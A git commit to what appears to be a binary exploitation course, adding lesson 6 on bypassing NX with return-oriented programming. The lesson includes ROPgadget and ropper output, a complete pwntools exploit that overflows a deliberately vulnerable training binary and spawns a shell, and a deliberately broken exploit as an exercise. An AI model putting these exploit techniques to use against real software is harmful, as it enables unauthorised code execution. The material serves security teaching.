Completed section 6

nnamon · nnamon · commit 57cd4fbae46f · 2017-01-13T16:17:06.000+08:00
diff --git a/Vagrantfile b/Vagrantfile
@@ -69,7 +69,7 @@ Vagrant.configure("2") do |config|
     cp /etc/apt/sources.list /etc/apt/sources.list.old
     sed -i -e 's/archive\.ubuntu\.com/mirror\.0x\.sg/g' /etc/apt/sources.list
     apt-get update
-    apt-get install -y libc6:i386 libncurses5:i386 libstdc++6:i386 gdb python python-pip libssl-dev gcc git binutils socat apt-transport-https ca-certificates libc6-dev-i386 python-capstone
+    apt-get install -y libc6:i386 libncurses5:i386 libstdc++6:i386 gdb python python-pip libssl-dev gcc git binutils socat apt-transport-https ca-certificates libc6-dev-i386 python-capstone libffi-dev
     pip install --upgrade pip
     pip install ropgadget
     pip install pwntools
diff --git a/lessons/1_setting_up_environment/lessonplan.md b/lessons/1_setting_up_environment/lessonplan.md
@@ -153,7 +153,7 @@ dpkg --add-architecture i386
 cp /etc/apt/sources.list /etc/apt/sources.list.old
 sed -i -e 's/archive\.ubuntu\.com/mirror\.0x\.sg/g' /etc/apt/sources.list
 apt-get update
-apt-get install -y libc6:i386 libncurses5:i386 libstdc++6:i386 gdb python python-pip libssl-dev gcc git binutils socat apt-transport-https ca-certificates libc6-dev-i386 python-capstone
+apt-get install -y libc6:i386 libncurses5:i386 libstdc++6:i386 gdb python python-pip libssl-dev gcc git binutils socat apt-transport-https ca-certificates libc6-dev-i386 python-capstone libffi-dev
 pip install --upgrade pip
 pip install ropgadget
 pip install pwntools
diff --git a/lessons/6_bypass_nx_rop/lessonplan.md b/lessons/6_bypass_nx_rop/lessonplan.md
@@ -179,18 +179,292 @@ Linux syscalls.
 
 ## Linux Syscalls
 
-talk about
-http://syscalls.kernelgrok.com/
-int 0x80
+Linux system calls or syscalls are interfaces between the user space application
+and the Linux kernel. Functionality performed by the Linux kernel can be invoked
+by placing parameters into the right registers and passing control to the
+interrupt vector 0x80 using the `int 0x80` opcode. Typically, this is not done
+by the program directly but by calling glibc wrappers.
+
+We will not go too deep into describing how the system calls work and go
+straight to the system call that interests us the most: execve. The execve
+system call runs an executable file within the context of the current process.
+
+If we take a look at the libc function, we get the following signature:
+
+`int execve(char const *path, char const *argv[], char const *envp[]);`
+
+Typically, we invoke this function in the following manner to spawn shells.
+
+`execve("/bin/sh", {0}, {0})`
+
+If we take a look at the syscall reference located [here][6], we can see that
+some parameters are expected in the eax, ebx, ecx, and edx registers.
+
+1. eax - holds the number of the syscall to be called
+2. ebx - a pointer to the string containing the file name to be executed
+3. ecx - a pointer to the array of string pointers representing argv
+4. edx - a pointer to the array of string pointers representing envp
+
+For our purposes, the value that each of the registers should contain are:
+
+```
+eax = 0xb
+ebx = "/bin/sh"
+ecx = memory address -> 0
+edx = memory address -> 0
+```
 
 ## Generating the ROP Chain
 
+Automatically finding the ROP gadgets to perform the `execve` syscall can be
+done by ROPgadget. It actually even generates the the output as a python script
+that you can embed into the skeleton.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/6_bypass_nx_rop/build$ ROPgadget --binary 1_staticnx --ropchain
+... snip ...
+ROP chain generation
+===========================================================
+
+- Step 1 -- Write-what-where gadgets
+
+	[+] Gadget found: 0x8050fb5 mov dword ptr [esi], edi ; pop ebx ; pop esi ; pop edi ; ret
+	[+] Gadget found: 0x8048453 pop esi ; ret
+	[+] Gadget found: 0x80484a0 pop edi ; ret
+	[-] Can't find the 'xor edi, edi' gadget. Try with another 'mov [r], r'
+
+	[+] Gadget found: 0x805495b mov dword ptr [edx], eax ; ret
+	[+] Gadget found: 0x807299a pop edx ; ret
+	[+] Gadget found: 0x80bbb46 pop eax ; ret
+	[+] Gadget found: 0x80493e3 xor eax, eax ; ret
+
+- Step 2 -- Init syscall number gadgets
+
+	[+] Gadget found: 0x80493e3 xor eax, eax ; ret
+	[+] Gadget found: 0x807e1df inc eax ; ret
+
+- Step 3 -- Init syscall arguments gadgets
+
+	[+] Gadget found: 0x80481d1 pop ebx ; ret
+	[+] Gadget found: 0x80e2fc9 pop ecx ; ret
+	[+] Gadget found: 0x807299a pop edx ; ret
+
+- Step 4 -- Syscall gadget
+
+	[+] Gadget found: 0x8070605 int 0x80
+
+- Step 5 -- Build the ROP chain
+
+	#!/usr/bin/env python2
+	# execve generated by ROPgadget
+
+	from struct import pack
+
+	# Padding goes here
+	p = ''
+
+	p += pack('<I', 0x0807299a) # pop edx ; ret
+	p += pack('<I', 0x080ee060) # @ .data
+	p += pack('<I', 0x080bbb46) # pop eax ; ret
+	p += '/bin'
+	p += pack('<I', 0x0805495b) # mov dword ptr [edx], eax ; ret
+	p += pack('<I', 0x0807299a) # pop edx ; ret
+	p += pack('<I', 0x080ee064) # @ .data + 4
+	p += pack('<I', 0x080bbb46) # pop eax ; ret
+	p += '//sh'
+	p += pack('<I', 0x0805495b) # mov dword ptr [edx], eax ; ret
+	p += pack('<I', 0x0807299a) # pop edx ; ret
+	p += pack('<I', 0x080ee068) # @ .data + 8
+	p += pack('<I', 0x080493e3) # xor eax, eax ; ret
+	p += pack('<I', 0x0805495b) # mov dword ptr [edx], eax ; ret
+	p += pack('<I', 0x080481d1) # pop ebx ; ret
+	p += pack('<I', 0x080ee060) # @ .data
+	p += pack('<I', 0x080e2fc9) # pop ecx ; ret
+	p += pack('<I', 0x080ee068) # @ .data + 8
+	p += pack('<I', 0x0807299a) # pop edx ; ret
+	p += pack('<I', 0x080ee068) # @ .data + 8
+	p += pack('<I', 0x080493e3) # xor eax, eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x0807e1df) # inc eax ; ret
+	p += pack('<I', 0x08070605) # int 0x80
+```
+
+Integrating the generated code is as easy as copy and pasting into the [final
+exploit][4].
+
+
+```python
+#!/usr/bin/python
+
+from pwn import *
+
+from struct import pack
+
+# Padding goes here
+rop = ''
+
+rop += pack('<I', 0x0807299a) # pop edx ; ret
+rop += pack('<I', 0x080ee060) # @ .data
+rop += pack('<I', 0x080bbb46) # pop eax ; ret
+rop += '/bin'
+rop += pack('<I', 0x0805495b) # mov dword ptr [edx], eax ; ret
+rop += pack('<I', 0x0807299a) # pop edx ; ret
+rop += pack('<I', 0x080ee064) # @ .data + 4
+rop += pack('<I', 0x080bbb46) # pop eax ; ret
+rop += '//sh'
+rop += pack('<I', 0x0805495b) # mov dword ptr [edx], eax ; ret
+rop += pack('<I', 0x0807299a) # pop edx ; ret
+rop += pack('<I', 0x080ee068) # @ .data + 8
+rop += pack('<I', 0x080493e3) # xor eax, eax ; ret
+rop += pack('<I', 0x0805495b) # mov dword ptr [edx], eax ; ret
+rop += pack('<I', 0x080481d1) # pop ebx ; ret
+rop += pack('<I', 0x080ee060) # @ .data
+rop += pack('<I', 0x080e2fc9) # pop ecx ; ret
+rop += pack('<I', 0x080ee068) # @ .data + 8
+rop += pack('<I', 0x0807299a) # pop edx ; ret
+rop += pack('<I', 0x080ee068) # @ .data + 8
+rop += pack('<I', 0x080493e3) # xor eax, eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x0807e1df) # inc eax ; ret
+rop += pack('<I', 0x08070605) # int 0x80
+
+def main():
+    # Start the process
+    p = process("../build/1_staticnx")
+
+    # Craft the payload
+    payload = "A"*148 + rop
+    payload = payload.ljust(1000, "\x00")
 
+    # Send the payload
+    p.send(payload)
+
+    # Transfer interaction to the user
+    p.interactive()
+
+if __name__ == '__main__':
+    main()
+```
+
+When we run the exploit, we get our shell.
+
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/6_bypass_nx_rop/scripts$ python 2_ropexploit.py
+[+] Starting local process '../build/1_staticnx': Done
+[*] Switching to interactive mode
+This is a big vulnerable example!
+I can print many things: deadbeef, Test String, 42
+Writing to STDOUT
+Reading from STDIN
+$ ls -la
+total 16
+drwxrwxr-x 1 ubuntu ubuntu 4096 Jan 12 20:31 .
+drwxrwxr-x 1 ubuntu ubuntu 4096 Jan 13  2017 ..
+-rw-rw-r-- 1 ubuntu ubuntu  422 Jan 12 06:03 1_skeleton.py
+-rw-rw-r-- 1 ubuntu ubuntu 1897 Jan 12 20:31 2_ropexploit.py
+$
+[*] Stopped program '../build/1_staticnx'
+ubuntu@ubuntu-xenial:/vagrant/lessons/6_bypass_nx_rop/scripts$
+```
 
 ## Exercises
 
 ### 6.1 Using Ropper to Generate ROP Chains
 
+There are alternative tools to ROPgadget that perform gadget searching and
+automatic chain generation. One such tool is ropper. You can generate an execve
+rop chain with the following command.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/6_bypass_nx_rop/build$ ropper --file 1_staticnx --chain execve
+[INFO] Load gadgets for section: LOAD
+[LOAD] loading... 100%
+[LOAD] removing double gadgets... 100%
+
+[INFO] ROPchain Generator for syscall execve:
+
+
+[INFO]
+write command into data section
+eax 0xb
+ebx address to cmd
+ecx address to null
+edx address to null
+
+
+[INFO] Try to create chain which fills registers without delete content of previous filled registers
+[*] Try permuation 1 / 24
+[INFO] Look for syscall gadget
+
+[INFO] syscall gadget found
+[INFO] generating rop chain
+#!/usr/bin/env python
+# Generated by ropper ropchain generator #
+from struct import pack
+
+p = lambda x : pack('I', x)
+
+IMAGE_BASE_0 = 0x08048000 # 1_staticnx
+rebase_0 = lambda x : p(x + IMAGE_BASE_0)
+
+rop = ''
+
+rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
+rop += '//bi'
+rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
+rop += rebase_0(0x000a6060)
+rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
+rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
+rop += 'n/sh'
+rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
+rop += rebase_0(0x000a6064)
+rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
+rop += rebase_0(0x000036ca) # 0x0804b6ca: pop dword ptr [ecx]; ret;
+rop += p(0x00000000)
+rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
+rop += p(0x00000000)
+rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
+rop += rebase_0(0x000a6068)
+rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
+rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret;
+rop += rebase_0(0x000a6060)
+rop += rebase_0(0x0009afc9) # 0x080e2fc9: pop ecx; ret;
+rop += rebase_0(0x000a6068)
+rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
+rop += rebase_0(0x000a6068)
+rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
+rop += p(0x0000000b)
+rop += rebase_0(0x0002afa0) # 0x08072fa0: int 0x80; ret;
+print rop
+[INFO] rop chain generated!
+```
+
+However, using this payload in a [modified script][5] does not work. Can you
+figure out why and fix it?
+
 [1]: ./src/1_staticnx.c
 [2]: ./build/1_staticnx
 [3]: ./scripts/1_skeleton.py
+[4]: ./scripts/2_ropexploit.py
+[5]: ./scripts/3_brokenrop.py
+[6]: http://syscalls.kernelgrok.com/
+
diff --git a/lessons/6_bypass_nx_rop/scripts/3_brokenrop.py b/lessons/6_bypass_nx_rop/scripts/3_brokenrop.py
@@ -0,0 +1,56 @@
+#!/usr/bin/python
+
+from pwn import *
+
+from struct import pack
+
+p = lambda x : pack('I', x)
+
+IMAGE_BASE_0 = 0x08048000 # 1_staticnx
+rebase_0 = lambda x : p(x + IMAGE_BASE_0)
+
+rop = ''
+
+rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
+rop += '//bi'
+rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
+rop += rebase_0(0x000a6060)
+rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
+rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
+rop += 'n/sh'
+rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
+rop += rebase_0(0x000a6064)
+rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
+rop += rebase_0(0x000036ca) # 0x0804b6ca: pop dword ptr [ecx]; ret;
+rop += p(0x00000000)
+rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
+rop += p(0x00000000)
+rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
+rop += rebase_0(0x000a6068)
+rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
+rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret;
+rop += rebase_0(0x000a6060)
+rop += rebase_0(0x0009afc9) # 0x080e2fc9: pop ecx; ret;
+rop += rebase_0(0x000a6068)
+rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
+rop += rebase_0(0x000a6068)
+rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
+rop += p(0x0000000b)
+rop += rebase_0(0x0002afa0) # 0x08072fa0: int 0x80; ret;
+
+def main():
+    # Start the process
+    p = process("../build/1_staticnx")
+
+    # Craft the payload
+    payload = "A"*148 + rop
+    payload = payload.ljust(1000, "\x00")
+
+    # Send the payload
+    p.send(payload)
+
+    # Transfer interaction to the user
+    p.interactive()
+
+if __name__ == '__main__':
+    main()
